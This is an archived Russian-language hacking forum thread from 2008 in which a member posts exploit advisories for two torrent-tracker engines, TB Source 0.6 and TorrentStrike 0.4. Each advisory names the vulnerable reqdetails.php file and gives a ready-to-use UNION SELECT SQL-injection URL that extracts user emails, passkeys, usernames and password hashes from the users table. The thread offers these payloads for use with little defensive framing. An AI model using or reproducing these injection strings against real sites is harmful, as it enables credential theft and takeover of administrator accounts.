HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости движков трэкеров
  #1  
Старый 11.05.2008, 14:11
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904

Репутация: 1393


По умолчанию Уязвимости движков трэкеров

Здесь выкладываем уязвимости трэкер-движков.

Я пожалую начну. Уязвимости готовил уже давно на milw0rm-e выкладывать но руки так и не дошли.

TB Source <= 0.6

Код:
#######################################
# TB Source <= 0.6 reqdetails.php SQL-Injection
# Discovered: z01b 
# Contact:    [censored]
# Thanx:      melco
#######################################
--------------------------------------------------
# Details  :
# Website : http://sourceforge.net/projects/tbsource/
# Vulnerable File : reqdetails.php
--------------------------------------------------


Vulnerability:

SQL-injection to obtain admin user and hash

http://www.site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users

#29.12.06

TorrentStrike <= 0.4


Код:
#######################################
# Torrent Strike <= 0.4 reqdetails.php SQL-Injection
# Discovered: z01b 
# Contact:    [censored]
# Thanx:      melco
#######################################
--------------------------------------------------
# Details  :
# Website : http://sourceforge.net/projects/torrentstrike/
# Vulnerable File : reqdetails.php
--------------------------------------------------

SQL querry, for recieving admin user and hash(md5):

http://site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users

#29.12.06

Последний раз редактировалось z01b; 11.05.2008 в 14:23..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости. Обсуждения. 9 15.08.2009 15:08
Классификация уязвимостей flintstone Статьи 1 16.01.2008 18:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ